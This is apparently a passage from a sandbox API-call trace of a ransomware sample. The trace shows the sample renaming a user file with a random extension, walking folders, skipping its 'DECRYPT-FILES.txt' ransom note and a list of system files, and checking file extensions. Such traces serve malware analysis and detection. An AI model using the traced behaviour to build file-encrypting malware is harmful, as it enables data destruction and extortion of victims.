[0080.304] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0080.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0080.304] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0080.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0080.304] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0080.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0080.304] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0080.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0080.304] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0080.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0080.304] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0080.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0080.304] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0080.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0080.304] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0080.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0080.304] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0080.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0080.304] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0080.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0080.304] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0080.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0080.305] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0080.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0080.305] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0080.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0080.305] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0080.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0080.305] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0080.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0080.305] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0080.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0080.305] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0080.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0080.305] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0080.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0080.305] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0080.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0080.305] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0080.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0080.305] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0080.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0080.305] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0080.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0080.305] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0080.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0080.306] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0080.306] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0080.306] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0080.306] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0080.306] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0080.306] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0080.306] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0080.306] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0080.306] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0080.306] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0080.306] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0080.306] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0080.306] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0080.306] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0080.306] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0080.306] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0080.306] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0080.306] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0080.306] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0080.306] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms") returned 128 [0080.306] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms.dnES") returned 133 [0080.306] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\d93f411851d7c929.customdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms.dnES" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\d93f411851d7c929.customdestinations-ms.dnes"), dwFlags=0x0) returned 1 [0080.307] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.307] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.308] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.308] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabef9da0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabef9da0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabef9da0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0080.308] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0080.308] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabef9da0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabef9da0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabef9da0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0080.308] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0080.308] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0080.308] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0080.308] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0080.308] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0080.308] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0080.308] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0080.308] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0080.308] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0080.308] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0080.308] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.308] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0080.308] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0080.308] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0080.308] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0080.308] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 90 [0080.308] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.309] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0080.309] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\jkbimi8.tmp" [0080.309] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.309] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0080.309] CloseHandle (hObject=0x0) returned 0 [0080.309] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.309] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabef9da0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabef9da0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabef9da0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0080.309] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0080.309] CloseHandle (hObject=0x458) returned 1 [0080.310] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89917d50, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8b027270, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8b027270, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x9f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CySgPL_RS7_GjN8uh.lnk", cAlternateFileName="CYSGPL~1.LNK")) returned 1 [0080.310] lstrcmpiW (lpString1="CySgPL_RS7_GjN8uh.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.310] lstrcmpiW (lpString1="CySgPL_RS7_GjN8uh.lnk", lpString2="autorun.inf") returned 1 [0080.310] lstrcmpiW (lpString1="CySgPL_RS7_GjN8uh.lnk", lpString2="boot.ini") returned 1 [0080.310] lstrcmpiW (lpString1="CySgPL_RS7_GjN8uh.lnk", lpString2="desktop.ini") returned -1 [0080.310] lstrcmpiW (lpString1="CySgPL_RS7_GjN8uh.lnk", lpString2="ntuser.dat") returned -1 [0080.310] lstrcmpiW (lpString1="CySgPL_RS7_GjN8uh.lnk", lpString2="iconcache.db") returned -1 [0080.310] lstrcmpiW (lpString1="CySgPL_RS7_GjN8uh.lnk", lpString2="bootsect.bak") returned 1 [0080.310] lstrcmpiW (lpString1="CySgPL_RS7_GjN8uh.lnk", lpString2="ntuser.dat.log") returned -1 [0080.310] lstrcmpiW (lpString1="CySgPL_RS7_GjN8uh.lnk", lpString2="thumbs.db") returned -1 [0080.310] lstrcmpiW (lpString1="CySgPL_RS7_GjN8uh.lnk", lpString2="Bootfont.bin") returned 1 [0080.310] lstrlenW (lpString="CySgPL_RS7_GjN8uh.lnk") returned 21 [0080.310] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.310] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a192bb0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8a192bb0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8a192bb0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xee8, dwReserved0=0x0, dwReserved1=0x0, cFileName="cZLwBD2he.lnk", cAlternateFileName="CZLWBD~1.LNK")) returned 1 [0080.310] lstrcmpiW (lpString1="cZLwBD2he.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.310] lstrcmpiW (lpString1="cZLwBD2he.lnk", lpString2="autorun.inf") returned 1 [0080.310] lstrcmpiW (lpString1="cZLwBD2he.lnk", lpString2="boot.ini") returned 1 [0080.310] lstrcmpiW (lpString1="cZLwBD2he.lnk", lpString2="desktop.ini") returned -1 [0080.310] lstrcmpiW (lpString1="cZLwBD2he.lnk", lpString2="ntuser.dat") returned -1 [0080.310] lstrcmpiW (lpString1="cZLwBD2he.lnk", lpString2="iconcache.db") returned -1 [0080.310] lstrcmpiW (lpString1="cZLwBD2he.lnk", lpString2="bootsect.bak") returned 1 [0080.310] lstrcmpiW (lpString1="cZLwBD2he.lnk", lpString2="ntuser.dat.log") returned -1 [0080.310] lstrcmpiW (lpString1="cZLwBD2he.lnk", lpString2="thumbs.db") returned -1 [0080.310] lstrcmpiW (lpString1="cZLwBD2he.lnk", lpString2="Bootfont.bin") returned 1 [0080.310] lstrlenW (lpString="cZLwBD2he.lnk") returned 13 [0080.310] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.310] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabe15560, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabe15560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabe15560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0080.310] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0080.310] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0080.310] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0080.310] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0080.310] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0080.310] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0080.311] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8af68b90, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8af68b90, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8af68b90, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x401, dwReserved0=0x0, dwReserved1=0x0, cFileName="DNJ0jH17yLgW1.lnk", cAlternateFileName="DNJ0JH~1.LNK")) returned 1 [0080.311] lstrcmpiW (lpString1="DNJ0jH17yLgW1.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.311] lstrcmpiW (lpString1="DNJ0jH17yLgW1.lnk", lpString2="autorun.inf") returned 1 [0080.311] lstrcmpiW (lpString1="DNJ0jH17yLgW1.lnk", lpString2="boot.ini") returned 1 [0080.311] lstrcmpiW (lpString1="DNJ0jH17yLgW1.lnk", lpString2="desktop.ini") returned 1 [0080.311] lstrcmpiW (lpString1="DNJ0jH17yLgW1.lnk", lpString2="ntuser.dat") returned -1 [0080.311] lstrcmpiW (lpString1="DNJ0jH17yLgW1.lnk", lpString2="iconcache.db") returned -1 [0080.311] lstrcmpiW (lpString1="DNJ0jH17yLgW1.lnk", lpString2="bootsect.bak") returned 1 [0080.311] lstrcmpiW (lpString1="DNJ0jH17yLgW1.lnk", lpString2="ntuser.dat.log") returned -1 [0080.311] lstrcmpiW (lpString1="DNJ0jH17yLgW1.lnk", lpString2="thumbs.db") returned -1 [0080.311] lstrcmpiW (lpString1="DNJ0jH17yLgW1.lnk", lpString2="Bootfont.bin") returned 1 [0080.311] lstrlenW (lpString="DNJ0jH17yLgW1.lnk") returned 17 [0080.311] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.311] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89f315b0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x89f315b0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x89f315b0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xedc, dwReserved0=0x0, dwReserved1=0x0, cFileName="dZ3NoWA.flv.lnk", cAlternateFileName="DZ3NOW~1.LNK")) returned 1 [0080.311] lstrcmpiW (lpString1="dZ3NoWA.flv.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.311] lstrcmpiW (lpString1="dZ3NoWA.flv.lnk", lpString2="autorun.inf") returned 1 [0080.311] lstrcmpiW (lpString1="dZ3NoWA.flv.lnk", lpString2="boot.ini") returned 1 [0080.311] lstrcmpiW (lpString1="dZ3NoWA.flv.lnk", lpString2="desktop.ini") returned 1 [0080.311] lstrcmpiW (lpString1="dZ3NoWA.flv.lnk", lpString2="ntuser.dat") returned -1 [0080.311] lstrcmpiW (lpString1="dZ3NoWA.flv.lnk", lpString2="iconcache.db") returned -1 [0080.311] lstrcmpiW (lpString1="dZ3NoWA.flv.lnk", lpString2="bootsect.bak") returned 1 [0080.311] lstrcmpiW (lpString1="dZ3NoWA.flv.lnk", lpString2="ntuser.dat.log") returned -1 [0080.311] lstrcmpiW (lpString1="dZ3NoWA.flv.lnk", lpString2="thumbs.db") returned -1 [0080.311] lstrcmpiW (lpString1="dZ3NoWA.flv.lnk", lpString2="Bootfont.bin") returned 1 [0080.311] lstrlenW (lpString="dZ3NoWA.flv.lnk") returned 15 [0080.311] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.311] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89ccffb0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x89ccffb0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x89ccffb0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xfa9, dwReserved0=0x0, dwReserved1=0x0, cFileName="DZdoyBFOvdeUBph.lnk", cAlternateFileName="DZDOYB~1.LNK")) returned 1 [0080.311] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.311] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.lnk", lpString2="autorun.inf") returned 1 [0080.311] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.lnk", lpString2="boot.ini") returned 1 [0080.311] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.lnk", lpString2="desktop.ini") returned 1 [0080.311] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.lnk", lpString2="ntuser.dat") returned -1 [0080.311] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.lnk", lpString2="iconcache.db") returned -1 [0080.311] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.lnk", lpString2="bootsect.bak") returned 1 [0080.311] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.lnk", lpString2="ntuser.dat.log") returned -1 [0080.311] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.lnk", lpString2="thumbs.db") returned -1 [0080.311] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.lnk", lpString2="Bootfont.bin") returned 1 [0080.312] lstrlenW (lpString="DZdoyBFOvdeUBph.lnk") returned 19 [0080.312] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.312] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a9c1750, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8a9c1750, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8a9c1750, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x3d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ebf4.lnk", cAlternateFileName="")) returned 1 [0080.312] lstrcmpiW (lpString1="ebf4.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.312] lstrcmpiW (lpString1="ebf4.lnk", lpString2="autorun.inf") returned 1 [0080.312] lstrcmpiW (lpString1="ebf4.lnk", lpString2="boot.ini") returned 1 [0080.312] lstrcmpiW (lpString1="ebf4.lnk", lpString2="desktop.ini") returned 1 [0080.312] lstrcmpiW (lpString1="ebf4.lnk", lpString2="ntuser.dat") returned -1 [0080.312] lstrcmpiW (lpString1="ebf4.lnk", lpString2="iconcache.db") returned -1 [0080.312] lstrcmpiW (lpString1="ebf4.lnk", lpString2="bootsect.bak") returned 1 [0080.312] lstrcmpiW (lpString1="ebf4.lnk", lpString2="ntuser.dat.log") returned -1 [0080.312] lstrcmpiW (lpString1="ebf4.lnk", lpString2="thumbs.db") returned -1 [0080.312] lstrcmpiW (lpString1="ebf4.lnk", lpString2="Bootfont.bin") returned 1 [0080.312] lstrlenW (lpString="ebf4.lnk") returned 8 [0080.312] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.312] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aeaa4b0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8aeaa4b0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8aeaa4b0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x99d, dwReserved0=0x0, dwReserved1=0x0, cFileName="eD8jo.flv.lnk", cAlternateFileName="ED8JOF~1.LNK")) returned 1 [0080.312] lstrcmpiW (lpString1="eD8jo.flv.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.312] lstrcmpiW (lpString1="eD8jo.flv.lnk", lpString2="autorun.inf") returned 1 [0080.312] lstrcmpiW (lpString1="eD8jo.flv.lnk", lpString2="boot.ini") returned 1 [0080.312] lstrcmpiW (lpString1="eD8jo.flv.lnk", lpString2="desktop.ini") returned 1 [0080.312] lstrcmpiW (lpString1="eD8jo.flv.lnk", lpString2="ntuser.dat") returned -1 [0080.312] lstrcmpiW (lpString1="eD8jo.flv.lnk", lpString2="iconcache.db") returned -1 